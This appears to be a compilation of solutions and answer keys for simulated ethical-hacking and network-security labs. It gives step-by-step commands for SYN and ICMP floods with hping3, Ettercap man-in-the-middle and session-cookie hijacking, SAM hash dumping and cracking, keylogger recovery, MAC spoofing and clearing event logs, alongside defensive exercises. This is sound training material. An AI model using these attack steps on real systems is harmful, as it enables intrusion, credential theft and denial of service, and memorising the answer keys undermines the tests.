Security analyst's laptop.Make sure Direction is set to Both.Select Save.
10.3.9 Perform a DoS Attack
Filter SYN packets Launch an hping3 flood Q1For the packet selected, what is the hex value for Flags? Your answer: 0x002 Correct answer: 0x002 Explanation In this lab, your task is to use Wireshark to capture and analyze TCP SYN flood attacks as follows: Filter captured packets to show TCP SYN packets for the enp2s0 interface. Use hping3 to launch a SYN flood attack against rmksupplies.com using Terminal. Examine a SYN packet with the destination address of 208.33.42.28 after capturing packets for a few seconds. Answer the question. Complete this lab as follows: 1. From the Favorites bar, open Wireshark. 2. Under Capture, select enp2s0. 3. Select the blue fin to begin a Wireshark capture. 4. In the Apply a display filter field, type tcp.flags.syn==1 and press Enter. 5. From the Favorites bar, open Terminal. 6. At the prompt, type hping3 --syn --flood rmksupplies.com and press Enter to start a TCP SYN flood against the CorpDC domain controller. 7. After a few seconds of capturing packets, select the red box to stop the Wireshark capture 8. In the top pane of Wireshark, select one of the packets captured with a destination address of 208.33.42.28. 9. In the middle pane of Wireshark, expand Transmission Control Protocol. 10. Scroll down to Flags. Notice that both Flags in this pane and the Info column in the top pane show this as a SYN packet. 11. In the top right, select Answer Questions. 12. Answer the question.
10.3.7 Analyze ICMP Traffic in Wireshark
Filter for ICMP packets Run ping Run hping3 for ICMP flood Q1: What is the main difference between a normal icmp (ping) request and an icmp flood? (Select TWO). Explanation In this lab, your task is to create and examine the results of an ICMP flood attack as follows: From Kali Linux, start a capture in Wireshark for the esp20 interface. Ping CorpDC at 192.168.0.11. Examine the ICMP packets captured. Use hping3 to launch an ICMP flood attack against CorpDC. Examine the ICMP packets captured. Answer the questions. Complete this lab as follows: 1. From the Favorites bar, open Wireshark. 2. Under Capture, select enp2s0. 3. Select the blue fin to begin a Wireshark capture. 4. From the Favorites bar, open Terminal. 5. At the prompt, type ping 192.168.0.11 and press Enter. 6. After some data exchanges, press Ctrl + c to stop the ping process. 7. In Wireshark, select the red box to stop the Wireshark capture. 8. In the Apply a display filter field, type icmp and press Enter. Notice the number of packets captured and the time between each packet being sent. 9. Select the blue fin to begin a new Wireshark capture. 10. In Terminal, type hping3 --icmp --flood 192.168.0.11 and press Enter to start a ping flood against CorpDC. 11. In Wireshark, select the red bo x to stop the Wireshark capture. Notice the type, number of packets, and the time between each packet being sent. 12. In Terminal, type Ctrl + c to stop the ICMP flood. 13. In the top right, select Answer Questions. 14. Answer the questions. 15. Select Score Lab.
10.2.8 Capture HTTP POST Packets with Wireshark
In this lab, your task is to analyze HTTP POST packets as follows: Use Wireshark to capture all packets. Filter the captured packets to show only HTTP POST data. Examine the packets captured to find clear text passwords. Answer the questions. Complete this lab as follows: From the Favorites bar, open Wireshark. Under Capture, select enp2s0. Select the blue fin to begin a Wireshark capture. Capture packets for five seconds. Select the red box to stop the Wireshark capture. Maximize Wireshark for easier viewing. In the Apply a display filter field, type http.request.method==POST and press Enter to show the HTTP POST requests. From the middle pane, expand HTML Form URL Encoded for each packet. Examine the information shown to find clear text passwords. In the top right, select Answer Questions. Answer the questions. Select Score Lab. Filter the captured packets to show only HTTP POST data Q1 How many HTTP POST packets were captured? 3 Q2 What is the source IP address of the packet containing the clear text password? Q3 What is the clear text password captured? St0ne$@
10.2.7 Perform an mitm attack from a remote computer
In this lab, your task is to complete the following: On Consult-Lap2, use ssh -X to connect to your rogue computer using the following paramenters: IP address: 192.168.0.251 Password: $uper$neaky Use Ettercap and the following parameters to launch a DHCP spoofing man-in-the-middle attack on your rogue computer and attempt to capture any unsecure passwords: Network Interface: enp2s0 Netmask: 255.255.255.0 DNS Server IP address: 192.168.0.11 On Exec, release and renew the IP address assigned by DHCP. Log in to the rmksupplies.com employee portal using the following credentials: Username: bjackson Password: $uper$ecret1 On Consult-Lap2, copy the session ID detected in Ettercap. On Consult-Lap, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie. Verify that you have hijacked the session. Complete this lab as follows: 1. From Conult-Lap2, connect to your rogue computer as follows: a. From the Favorites bar, open Terminal. b. At the prompt, type ssh -X 192.168.0.251 and press Enter. c. For the password, type $uper$neaky and press Enter. You are now connected to Rogue1. 2. Use Ettercap to launch a DHCP spoofing man-in-the-middle attack as follows: a. At the prompt, type ettercap and press Enter to launch Ettercap remotely. Ettercap is running on the remote computer, but you see the screen locally. b. Select Sniff. c. Select Unified sniffing. d. From the Network Interface drop-down list, select enp2s0. e. Click OK. f. Select Mitm. g. Select DHCP spoofing. h. In the Netmask field, enter 255.255.255.0. i. In the DNS Server IP field, enter 192.168.0.11. j. Click OK. 3. On Exec, release and renew the IP address as follows: a. From top navigation tabs, select Buildings. b. Under Building A, select Floor 1. c. Under Executive Office, select Exec. d. Right-click Start and select Windows PowerShell (Admin). e. Type ipconfig /release and press Enter to release the currently assigned addresses. f. Type ipconfig /renew and press Enter to request a new IP address from the DHCP server. 4. Log into the rmksupplies.com employee portal as follows: a. From the taskbar, open Chrome. b. Maximize the window for easier viewing. c. In the URL field, enter rmksupplies.com and press Enter. d. At the bottom of the page, select Employee Portal. e. In the Username field, enter bjackson. f. In the Password field, enter $uper$ecret1. g. Select Login. You are logged in as Blake Jackson. 5. On Consult-Lap2, copy the session ID detected in Ettercap as follows: a. From the top navigation tabs, select Building A. b. Under Red Cell, select Consult-Lap2. c. In the Ettercap console, find bjackson's username, password, and session cookie (.login) captured in Ettercap. d. Highlight the session ID. e. Press Ctrl + C to copy. 6. On Consult-Lap, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie as follows: a. From the top navigation tabs, select Building A. b. Under Red Cell, select Consult-Lap. c. From the taskbar, open Chrome. d. Maximize the window for easier viewing. e. In Chrome's URL field, enter rmksupplies.com. f. Press Enter. g. In the top right corner, select cookie to open the cookie editor. h. At the top, select the plus + sign to add a new session cookie. i. In the Name field, enter .login j. In the Value field, press Ctrl + V to paste in the session cookie you copied from Ettercap. k. Make sure rmksupplies.com appears in the Domain field. l. Select the green check mark to save the cookie. m. Click outside the cookie editor to close the editor. n. At the bottom of the rkmsupplies page, select Employee Portal. You are now on Blake Jackson's web session on your external computer.
10.2.11 Hijack a Web Session
In this lab, your task is to hijack a web session as follows: On IT-Laptop, use Ettercap to sniff traffic between the employee's computer in Office1 and the gateway. Initiate a man-in-the-middle attack to capture the session ID for the employee portal logon. On Office1, log in to the employee portal on rmksupplies.com using the following credentials:Username: bjacksonPassword: $uper$ecret1 On IT-Laptop, copy the session ID detected in Ettercap. On Office2, navigate to rmksupplies.com and use the cookie editor plug-in in Chrome to inject the session ID cookie. Verify that you hijacked the session. Complete this lab as follows: On IT-Laptop, open Terminal from the sidebar. At the prompt, type host office1 and press Enter to get the IP address of Office1. Type route and press Enter to get the gateway address. Use Ettercap to sniff traffic between Office1 and the gateway as follows:From the Favorites bar, open Ettercap.Maximize the window for easier viewing.Select Sniff > Unified sniffing.From the Network Interface drop-down list, select enp2s0.Click OK.Select Hosts > Scan for hosts.Select Hosts > Host list.We want to target information between Office1 (192.168.0.33) and the gateway (192.168.0.5).Under IP Address, select 192.168.0.5.Select Add to Target 1.Select 192.168.0.33.Select Add to Target 2. Initiate a man-in-the-middle attack as follows:Select Mitm > ARP poisoning.Select Sniff remote connections.Click OK. You are ready to capture traffic. On Office1, log in to the employee portal on rmksupplies.com as follows:From the top navigation tabs, select Floor 1 Overview.Under Office 1, select Office1.From the taskbar, open Chrome.Maximize the window for easier viewing.In the URL field, enter rmksupplies.com.Press Enter.At the bottom of the page, select Employee Portal.In the Username field, enter bjackson.In the Password field, enter $uper$ecret1.Click Login.You are logged into the portal as Blake Jackson. On IT-Laptop, copy the session ID detected in Ettercap as follows:From the top navigation tabs, select Floor 1 Overview.Under IT Administration, select IT-Laptop.In the Ettercap console, find bjackson's username, password, and session cookie (.login) captured in Ettercap.Highlight the session ID.Press Ctrl + C to copy. On Office2, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie as follows:From the top navigation tabs, select Floor 1 Overview.Under Office 2, select Office2.From the taskbar, open Chrome.Maximize the window for easier viewing.In Chrome's URL field, enter rmksupplies.com.Press Enter.In the top right corner, select cookie to open the cookie editor.At the top, select the plus + sign to add a new session cookie.In the Name field, enter .loginIn the Value field, press Ctrl + V to paste in the session cookie you copied from Ettercap.Make sure rmksupplies.com is in the Domain field.Select the green check mark to save the cookie.Click outside the cookie editor to close the editor. At the bottom of the rkmsupplies page, select Employee Portal.You are now on Blake Jackson's web session.
11.2.9 Perform a Decoy Scan
In this lab, your task is to use nmap to perform a decoy scan on enp2s0 and to use Wireshark to see the results. Use Wireshark to capture packets on the enp2s0 network interface. Use nmap to perform a decoy scan targeting the 192.168.0.31 IP address using 10 random IP addresses. Complete this lab as follows: From the Favorites bar, open Wireshark. Under Capture, select enp2s0. In the upper left menu, select the blue fin to start a scan. From the Favorites bar, open Terminal. At the prompt, type nmap -D RND:10 192.168.0.31 and press Enter. Maximize the window for easier viewing. In Wireshark, scroll down until you see 192.168.0.31 in the Destination column. Under Source, view the different IP addresses used to disguise the scan
11.1.10 Implement Intrusion Detection
In this lab, your task is to: Enable the IPS on the LAN and DMZ interface. Manually update the IPS signature using C:\signatures\sbips000018.bin Use the following credentials to configure the NSA to automatically update the signature in the future:Username: mary.r.brownPassword: Upd@teN0w (0 is a zero) Set the IPS policies to detect and prevent all known threats. Complete this lab as follows: Enable IPS as follows:In the Security Appliance Configuration utility, select IPS.Under IPS Enable, select Enable IPS Protection for LAN.Select Enable IPS Protection for DMZ.Select Apply. Update the IPS signature as follows:Under Manual Signature Updates, select Browse.Browse to and select C:\Signatures\SBIPS000018.bin.Select Open.Select Upload.Refresh the page to update the IPS Signatures status.Select Automatically Update Signatures.In the Cisco.com User Name field, enter mary.r.brown.In the Password field, enter Upd@teN0w (0 is a zero).Select Apply. Configure IPS policies as follows:In the left menu, select IPS Policy.For each IPS Category, select Detect and Prevent.Select Apply.
12.2.10 Evaluate Network Security with Hunter 2
Lab Questions Q1Workstation information is being exfiltrated to 203.176.135.102. To which country is the workstation information being exfiltrated? Your answer: Cambodia Correct answer: Cambodia Q2What is the MAC address of the workstation? Your answer: 00:08:02:1C:47:AE Correct answer: 00-08-02-1C-47-AE Q3User information is being exfiltrated to 170.238.117.187. What is suspicious about the port that is being used by host 170.238.117.187? Your answer: It is not a standard HTTP port. Correct answer: It is not a standard HTTP port. Q4User information is being exfiltrated to 170.238.117.187. What is the phone number of the user? Your answer: 8015558861 Correct answer: 8015558861 Q5A request to download a file containing a virus is made twice from 66.70.218.46. What is the name of one of the virus files? Your answer: imgpaper.png HTTP/1.1 Correct answer: imgpaper.png or cursor.png Q6What is the size of the virus file downloaded from 66.70.218.46? Your answer: 446515 Correct answer: 446515 EXPLANATION Complete this lab as follows: Access Security Onion. From the Favorites bar, select Google Chrome. In the address field, enter 192.168.0.101 and press Enter to access Security Onion. Log in to Security Onion using the following: Email address: [email protected] Password: password Select LOGIN. Access Hunt. Select the hamburger menu and then click Hunt. Maximize the window for better viewing. Examine the ET MALWARE Win32/Trickbot Data Exfiltration alert event. Under Events, locate and expand the ET MALWARE Win32/Trickbot Data Exfiltration event. Examine the various fields, especially destination.geo.country_name and network.data.decoded. In the top right, select Answer Questions. Answer Questions 1 and 2. Expand and examine the ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 2 alert event. Under Events, locate and expand the ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 2 event. Examine the various fields, especially destination.port and network.data.decoded. In the top right, select Answer Questions. Answer Questions 3 and 4. Examine the ET USER_AGENTS Suspicious User-Agent (contains loader) alert event. Under Events, expand the ET USER_AGENTS Suspicious User-Agent (contains loader) event. Examine the various fields, especially network.data.decoded. Answer Question 5. Examine the ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response alert event. Under Events, expand the ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response event. Examine the various fields, especially network.data.decoded. Answer Question 6. Select Score Lab.
14.3.12 Examine a Forensic Drive Image
Please see https://pastebin.com/D0pf9q2f
12.3.6 Log Events with pfSense
Q1What is the maximum number of logs that can be displayed? Correct answer: 50 General settings Show Details Enable remote logging Configure remote logging Show Details Q2What is the maximum number of logs that can be displayed after configuring the system log settings? Correct answer: 25 EXPLANATION Complete this lab as follows: Sign in to the pfSense Management console. In the Username field, enter admin. In the Password field, enter P@ssw0rd (zero). Select SIGN IN or press Enter. Access the system log settings. From the pfSense menu bar, select Status > System Logs. In the top right, select Answer Questions. Answer Question 1. Configure the general logging options. Under the Status breadcrumb, select Settings. Set the GUI Log Entries field to 25 to show only 25 logs at a time in the GUI. Set the Log file size field to 250000 byes (250 KB) to set the maximum size of each log file. Configure remote logging. Scroll to the bottom and, under Remote Logging Options, select Enable Remote Logging. Make sure the options are set as follows: Source address: Default (any) IP protocol: IPv4 Remote log servers: 192.168.0.10 For Remote Syslog Contents, select the following: System Events Firewall Events Select Save. View the results of the changes made to the number of logs shown. Under the Status breadcrumb, select System. Answer Question 2. Select Score Lab.
12.3.7 Evaluate Event Logs in pfSense
Q1What, if any, indication is there of an on-path attack? Correct answer: There are two DHCPACK entries with the same IP and MAC address. EXPLANATION Complete this lab as follows: Sign in to the pfSense management console. In the Username field, enter admin. In the Password field, enter P@ssw0rd (zero). Select SIGN IN or press Enter. Access pfSense logs. From the pfSense menu bar, select Status > System Logs. Under the Status breadcrumb, select DHCP. Examine the entries. In the top right, select Answer Questions. Answer Question 1.
10.2.12 Create a Remote Access Policy
Required Actions Create the Development network policy Configure permissionsShow Details Configure policy conditions Add secure password EAP MS-CHAP v2 authenticationShow Details Set a session timeout of 30 minutes Configure a constraint for 6 a.m. to 9 p.m., Monday-Friday Place the policy at the top of the list Enable the policy (done by default) EXPLANATION Complete this lab as follows: Create a remote access network policy named Sales. From Server Manager, select Tools > Network Policy Server. Maximize the window for better viewing. Expand Policies. Right-click Network Policies and then select New. In the Policy name field, enter Sales. From the Type of network access server drop-down list, select Remote Access Server (VPN-Dial up). Select Next. Add a condition to the network policy. Select Add to add group membership as a condition. Select Windows Groups. Select Add. Select Add Groups. Under Enter the object names to select, enter Sales. Select OK. Select OK to close the Windows Groups dialog. Select Next. Specify the access permissions. Select Access denied. Select Access is determined by User Dial-in properties. Select Next. Configure the authentication methods. Under EAP Types, select Add. Select Microsoft: Secured password (EAP-MSCHAP v2) and then select OK. Under Less secure authentication methods, unmark all options. Select Next. Configure a session timeout constraint. Under Constraints, select Session Timeout. Select Disconnect after the following maximum session time. Set the timeout session time to 30 minutes. Configure a day and time restriction constraint. Under Constraints, select Day and Time restrictions. Select Allow access only on these days and at these times. Select Edit. Modify the settings to allow access only from 6:00 a.m. to 9:00 p.m., Monday-Friday. Select OK and then select Next. From the Configure Settings dialog (RADIUS Attributes), select Next. Select Finish. Under Policy Name, make sure that the Sales policy is at the top of the list.
10.4.7 Extract Web Server Information with Nmap
Required Actions & Questions Display the HTTP server header Q1 Which software is used by www.corpnet.com to offer the HTTP service? Correct answer: Microsoft-IIS 10.0 Measure the time a website takes to deliver a web page Q2 What was the average time it took to scan docs?Correct answer: 3.14ms Perform a HEAD request for the root folder Crawl through the website and return any error pages Q3 How many error codes were found? Correct answer: 3 Look for the malware signatures of known server compromises Q4Did the host appear to be free of malware? Correct answer:No Display HTML and JavaScript comments Q5What is the last comment listed on line 20 of the web page at http://www.corpnet.xyz:80? Correct answer: <!--Google Analytics Code--> EXPLANATION Complete this lab as follows: Display the HTTP server header. From the Favorites bar, select Terminal. At the prompt, type nmap --script=http-server-header -p80 198.28.1.1 and press Enter to run the script. From the top right, select Answer Questions. Answer Question 1. Measure the time a website takes to deliver its web pages. Type nmap --script=http-chrono -p80 198.28.1.1 and press Enter to run script. Answer Question 2. Perform a HEAD request for the root folder and crawl through the website to look for error pages. Type nmap --script=http-headers -p80 198.28.1.1 and press Enter to run the script. Type nmap --script=http-errors -p80 198.28.1.1 and press Enter to run the script. Under Lab Questions, answer Question 3. Look for malware signatures of known server compromises. Type nmap --script=http-malware-host -p80 198.28.1.1 and press Enter to run the script. Answer Question 4. Display HTML and JavaScript comments. Type nmap --script=http-comments-displayer -p80 198.28.1.1 and press Enter to run the script. Answer Question 5.Select Score Lab.
12.3.13 Evaluate Windows Log Files
Required Actions & Questions run Get-Eventlog -logname * Q1How many event logs are being captured on Office1? Correct answer: 7 Run Get-Eventlog -logname system Q2Which entry types were used for the last two log entries of the system log? Correct answer: Warning, Information Run Get-Eventlog -logname application Q3What was the source of the last error entry listed in the application log? Correct answer: Application Q4What is the InstanceID for the last application log entry? Correct answer: 1085 Q5For which program did the last error message create an entry in the application log? Correct answer: Notepad++ Run Get-Eventlog -logname security Q6Which security entries might be of MOST concern and may warrant further evaluation? Correct answer: An account failed to log on.... EXPLANATION Complete this lab as follows: Get a list of the current logs being capture on Office1. Right-click Start and select Windows PowerShell (Admin). Maximize the window for easier viewing. At the prompt, type Get-Eventlog -logname * and press Enter. In the top right, select Answer Questions. Answer Question 1. View the system log file and answer the question. Use the UP arrow key to reuse previous commands. From PowerShell, type Get-Eventlog -logname system and press Enter. Maximize the window for better viewing. Examine the last two entries. Answer Question 2. View the application log file and answer the questions. You may want to clear the screen using the CLS command. From PowerShell, type Get-Eventlog -logname application and press Enter. Examine the last entry. Answer Questions 3-5. View the security log file and answer the questions. From PowerShell, type Get-Eventlog -logname security and press Enter. Examine the entries. Answer Question 6. Select Score Lab.
8.4.11 Hide files with OpenStego You are the IT security administrator for a small corporate network. Recently, some of your firm's proprietary data leaked online. You have been asked to use steganography to encrypt data into a file that will be shared with a business partner. The data will allow you to track the source if the information is leaked again. In this lab, your task is to use OpenStego to hide data inside a picture file as follows: Encrypt the user data found in John.txt into gear.png. Save the output file into the Documents folder as send.png. Password protect the file with NoMor3L3@ks! as the password. Confirm the functionality of the steganography by extracting the data from send.png into the Exports folder and opening the file to view the hidden user data.
Solution 1. Encrypt the user data into the file to be shared as follows: a. In the search field on the taskbar, type OpenStego. b. Under Best match, select OpenStego. c. In the Message File field, select the ellipses at the end of the field. d. Select John.txt. e. Select Open. f. In the Cover File field, select the ellipses at the end of the field. g. Select gear.png file. h. Select Open. i. In the Output Stego File field, select the ellipses at the end of the field. j. In the File name field, enter send.png. k. Select Open. 2. Password protect the file as follows: a. In the Password field, enter NoMor3L3@ks! b. In the Confirm Password field, enter NoMor3L3@ks! c. Select Hide Data. d. Select OK. 3. Extract the data and open the file as follows: a. Under Data Hiding, select Extract Data. b. In the Input Stego File field, select the ellipses. c. Select send.png file with the encryption. d. Select Open. e. In the Output Folder for Message File field, select the ellipses. f. Double-click Export to set it as the destination of the output the file. g. Click Select Folder. h. In the Password field, enter NoMor3L3@ks! as the password. i. Select Extract Data. j. Select OK. k. From the taskbar, open File Explorer. l. Double-click Documents to navigate to the folder. m. Double-click Export to navigate to the folder. n. Double-click John.txt to open the output file and verify that the decryption process was successful.
10.1.6 Spoof MAC addresses with SMAC As an IT administrator, you need to know how security breaches are caused. You know that SMAC is used for MAC spoofing, so you are going to spoof your MAC address. In this lab, your task is to complete the following: On Office2 use ipconfig /all and find the IP address and MAC address. Spoof the MAC address on ITAdmin to that of Office2 using SMAC. Refresh your MAC and IP addresses to match the target machine.
Solution 1. Find the IP address and MAC address as follows: a. Right-click Start and select Windows PowerShell (Admin). b. At the command prompt, type ipconfig /all and press Enter. c. Find the MAC address and the IP address. 2. Spoof the MAC address as follows: a. From the top navigation tabs, select Floor 1 Overview. b. Under IT Administration, select ITAdmin. c. In the search bar, type SMAC. d. Under Best match, right-click SMAC and select Run as administrator. e. In the New Spoofed Mac Address field, type 00:00:55:55:44:15 for the MAC address from Office2. f. Select Update MAC. g. Select OK to restart the adapter. 3. Refresh your MAC and IP addresses as follows: a. Right-click Start and select Windows PowerShell (Admin). b. At the command prompt, type ipconfig /all to confirm the MAC address has been updated. c. Type ipconfig /renew to update the IP address.
9.2.5 Detect open ports with nmap You are a cybersecurity expert performing a penetration test for a client. Your client is concerned that hackers may be performing port scanning on the network, hoping to find open ports that could leave the company vulnerable to attacks. In this lab, your task is to use nmap to detect open ports as follows: Scan the following network addresses:198.28.1.0/24192.168.0.0/24 Find and report any open ports, especially those susceptible to hacking attacks. Answer the questions.
Solution 1. From the Favorites bar, open Terminal. 2. At the prompt, type nmap -p- 198.28.1.0/24 and press Enter to scan for open ports on all servers located on this network. 3. Type nmap -p- 192.168.0.0/24 and press Enter to scan for open ports on all the servers located on this network. 4. In the top right, select Answer Questions. 5. Answer the questions. 6. Select Score Lab Question 1: 192.168.0.0 Question 2: 192.168.0.8, 192.168.0.10, 192.168.0.11, 192.168.0.14
9.2.6 View open ports with netstat You work for a penetration testing consulting company. During an internal penetration test, you find that VNC is being used on the network, which violates your company's security policies. It was installed to maintain access by a malicious employee. Run a scan using nmap to discover open ports on host machines to find out which host machines are using port 5900 for VNC. In this lab, your task is to complete the following: Use Zenmap to scan for open ports running VNC. Use the table below to help you identify the computer. Go to the suspect computer and uninstall VNC. From the suspect computer, run netstat to verify the ports for VNC are closed.
Solution 1. From the Favorites bar, open Zenmap. 2. In the Command field, type nmap -p 5900 192.168.0.0/24. 3. Select Scan. 4. From the results, find the computer with port 5900 open. 5. From the top navigation tabs, select Floor 1 Overview. 6. Under Support Office, select Support. 7. From the Favorites bar, open Terminal. 8. At the prompt, type netstat and press Enter to confirm the port is open on the machine. 9. Type dnf list vnc and press Enter to find the package name. 10. Type dnf erase libvncserver and press Enter. 11. Press Y and press Enter to uninstall the package. 12. Type netstat and press Enter to confirm the port has been closed on the machine.
8.1.14 Configure account password policies You are the IT administrator for a small corporate network. You are attempting to improve the password security of the Windows 10 laptop in the Lobby. In each policy, the Explain tab provides a description of the effects of the policy to help you identify which policy to configure with which value. In this lab, your task is to use the Local Security Policy tool to configure password restrictions as follows: Passwords must be at least 10 characters long. Passwords must be changed every 30 days. New passwords cannot be the same as the previous four passwords. New passwords cannot be changed for at least two days. Passwords must contain non-alphabetical characters. Lock the user account after four incorrect logon attempts within a 30-minute period. Automatically unlock locked accounts after one hour.
Solution 1. Select Start. 2. Select Windows Administrative Tools. 3. Select Local Security Policy. 4. In the left pane, expand Account Policies. 5. Select Password Policy. 6. Double-click the policy you want to configure. 7. Configure the policy settings. 8. Click OK. 9. Repeat steps 6-8 to configure additional policies. 10. Select Account Lockout Policy. 11. Repeat steps 6-8 to configure policy settings.
8.2.6 Crack the SAM database with john the ripper As the cybersecurity specialist for your company, you're performing a penetration test. As part of this test, you're checking to see if the Security Account Manager (SAM) passwords from a Windows system can be cracked using John the Ripper. In this lab, your task is to crack the SAM passwords as follows: On Office 1, use pwdump7 to export the contents of the SAM to SAMhash.txt. This machine has already been booted into a recovery mode, allowing you to use Troubleshoot > Advanced > Command Prompt to access the SAM file. Copy the exported file to the thumb drive (g: drive) and then move the thumb drive to the IT-Laptop computer. After the thumb drive is inserted, it is automatically mounted to /media/root/ESD-USB/. On IT-Laptop, crack the password using the echo and John the Ripper commands.
Solution 1. Use pwdump7 to create a text file containing the SAM password hashes and copy the new file to the thumb drive as follows: a. From the recovery dialog, select Troubleshoot. b. Select Advanced options. c. Select Command Prompt. d. Type pwdump7 > SAMhash.txt and press Enter. e. Type copy SAMhash.txt g: and press Enter. 2. Move the thumb drive from Office 1 to the IT-Laptop computer as follows: a. From the top navigation tabs, select Office 1. b. Select the USB Thumb Drive plugged into the front of the computer. c. Drag the USB Thumb Drive to the Shelf so you can access it later in the IT Administration office. d. From the top navigation tabs, select Floor 1 Overview. e. Under IT Administration, select Hardware. f. Above IT-Laptop, select Back to switch to the back view of the laptop. g. From the Shelf, drag the USB Thumb Drive to a USB port on the laptop computer. h. Above IT-Laptop, select Front to switch to the front view of the laptop. i. On the monitor, select Click to view Linux. 3. Create a new hash file that contains the hash to be cracked as follows: a. From the Favorites bar, open Terminal. b. Type cat /media/root/ESD-USB/SAMhash.txt and press Enter. c. Type echo. d. Press the space bar. e. In the Admin line of the output, select the hash in the fourth field. Each field is separated by a colon. This is the hash value that needs to be cracked. f. Right-click the hash in the fourth field of the Admin line. Notice that the hash was pasted into the command line. g. Press the space bar. h. Type > SAMhash.txt. i. Press Enter. 4. Use John the Ripper and the new hash file to crack the password as follows: a. Type john SAMhash.txt and press Enter. b. From the output, find the Admin's password. c. In the top right, select Answer Questions. d. Answer the questions. e. Select Score Lab. Question 1: P@55word!
8.1.4 Analyze a USB keylogger attack The CEO of CorpNet.xyz has hired your firm to obtain some passwords for their company. A senior IT network administrator, Oliver Lennon, is suspected of wrongdoing and suspects he is going to be fired from the company. The problem is that he changed many of the standard passwords known to only the top executives, and now he is the only one that knows them. Your company has completed the legal documents needed to protect you and the company. With the help of a CorpNet.xyz executive, you were allowed into the IT Admin's office after hours. You unplugged the keyboard from the back of the ITAdmin computer and placed a USB keylogger into the USB, then plugged the USB keyboard into the keylogger. After a week, the company executive lets you back into the IT Admin's office after hours again. In this lab, your task is to use the keylogger to recover the changed passwords as follows: Move the keyboard USB connector to a different USB port on ITAdmin. Remove the keylogger from ITAdmin. Move the consultant laptop from the Shelf to the Workspace. Plug the keylogger into the consultant laptop's USB drive. Use the SBK key combination to toggle the USB keylogger from keylogger mode to USB flash drive mode. Open the LOG.txt file and inspect the contents. Find the olennon account's password. Find the Administrator account's password. Answer the questions.
Solution Above the computer, select Back to view the back of the computer. On the back of the computer, drag the USB Type A connector for the keyboard to another USB port on the computer. Make sure to plug the keyboard back in. On the Shelf, expand System Cases. Drag the Laptop to the Workspace. Above the laptop, select Back to view the back of the laptop. From the computer, drag the keylogger to a USB port on the laptop. Above the laptop, select Front to view the front of the laptop. On the laptop, select Click to view Windows 10. Press S + B + K to toggle from the keylogger mode to the flash drive mode. Select Tap to choose what happens with removable drives. Select Open folder to view files. Double-click LOG.txt to open the file. In the top right, select Answer Questions. Answer the questions. Select Score Lab. Question 1: P@ssw0rd Question 2: 4Lm87Qde
9.2.7 Scan for open ports from a remote computer CorpNet.xyz has hired you as a penetration testing consultant. While visiting the company, you connected a small computer to the switch in the Networking Closet. This computer also functions as a rogue wireless access point. Now you are sitting in your van in the parking lot of CorpNet.xyz, where you are connected to the internal network through the rogue wireless access point. Using the small computer you left behind, you can perform remote exploits against the company. In this lab, your task is to: Use ssh -X to connect to your rogue computer (192.168.0.251). Use 1worm4b8 as the root password. Use Zenmap on the remote computer to scan all the ports on the internal network looking for computers vulnerable to attack. Answer the question.
Solution From the Favorites bar, open Terminal. At the prompt, type ssh -X 192.168.0.251 and press Enter. For the root password, type 1worm4b8 and press Enter. You are now connected to Rogue1. Type zenmap and press Enter to launch Zenmap remotely. Zenmap is running on the remote computer, but you see the screen locally. In the Command field, type nmap -p- 192.168.0.0/24. Select Scan. From the results, find the computers with ports open that make them vulnerable to attack. In the top right, select Answer Questions. Answer the question. Select Score Lab. Question 1: 192.168.0.10, 192.168.0.14, 192.168.0.45, 192.168.0.11
8.4.5 Clear windows log files on server 2016 You are a cybersecurity consultant and have been asked to work with the ACME, Inc. company to ensure that their network is protected from hackers. As part of the tests, you need to clear a few log files. In this lab, your task is to use Windows PowerShell (as Admin) to clear the following event logs: Use get-eventlog to view the available event logs. Use clear-eventlog to clear the Application and System logs.
Solution In this lab, your task is to use Windows PowerShell (as Admin) to clear the following event logs: Use get-eventlog to view the available event logs. Use clear-eventlog to clear the Application and System logs. Complete this lab as follows: Right-click Start and select Windows PowerShell (Admin). Maximize the window for easier viewing. At the prompt, type Get-Eventlog -logname * and press Enter.In the Entries column, notice the number of entries for the logs. Type Clear-Eventlog -logname Application and press Enter. Type Clear-Eventlog -logname System and press Enter. Type Get-Eventlog -logname * and press Enter.The log entries for Application is zero. The log entries for System is one because another event occurred between the times you cleared the log and viewed the entry list.
10.1.11 Filter and analyze traffic with wireshark You are the IT administrator for a small corporate network. You need to find specific information about the packets being exchanged on your network using Wireshark. In this lab, your task is to: Use Wireshark to capture packets from the enp2s0 interface. Use the following Wireshark filters to isolate and examine specific types of packets:net 192.168.0.0host 192.168.0.34tcp contains password Answer the questions.
Solution 1. Begin a Wireshark capture as follows: a. From the Favorites bar, open Wireshark. b. Under Capture, select enp2s0. c. Select the blue fin to begin a Wireshark capture. 2. Apply the net 192.168.0.0 filter as follows: a. In the Apply a display filter field, type net 192.168.0.0 and press Enter. Look at the source and destination addresses of the filtered packets. b. In the top right, select Answer Questions. c. Under Lab Questions, answer question 1. 3. Apply the host 192.168.0.34 filter as follows: a. In the Apply a display filter field, type host 192.168.0.34 and press Enter. Look at the source and destination addresses of the filtered packets. b. Under Lab Questions, answer question 2. 4. Apply the tcp contains password filter as follows: a. In the Apply a display filter field, type tcp contains password and press Enter. b. Select the red box to stop the Wireshark capture. c. Locate the password in the captured packet. d. Under Lab Questions, answer question 3. e. Select Score Lab Question 1: Packets with either a source or destination address on the 192.168.0.0 network are displayed. Question 2: Packets with 192.168.0.34 in either the source or destination address are displayed. Question 3: St@y0ut!@
8.1.10 Crack a password with john the ripper You are the IT security administrator for a small corporate network. You've received a zip file that contains sensitive password-protected files. You need to access these files. The zip file is located in the home directory. In this lab, your task is to use John the Ripper to: Crack the root password on Support. Crack the password of the protected.zip file in the home directory on IT-Laptop.
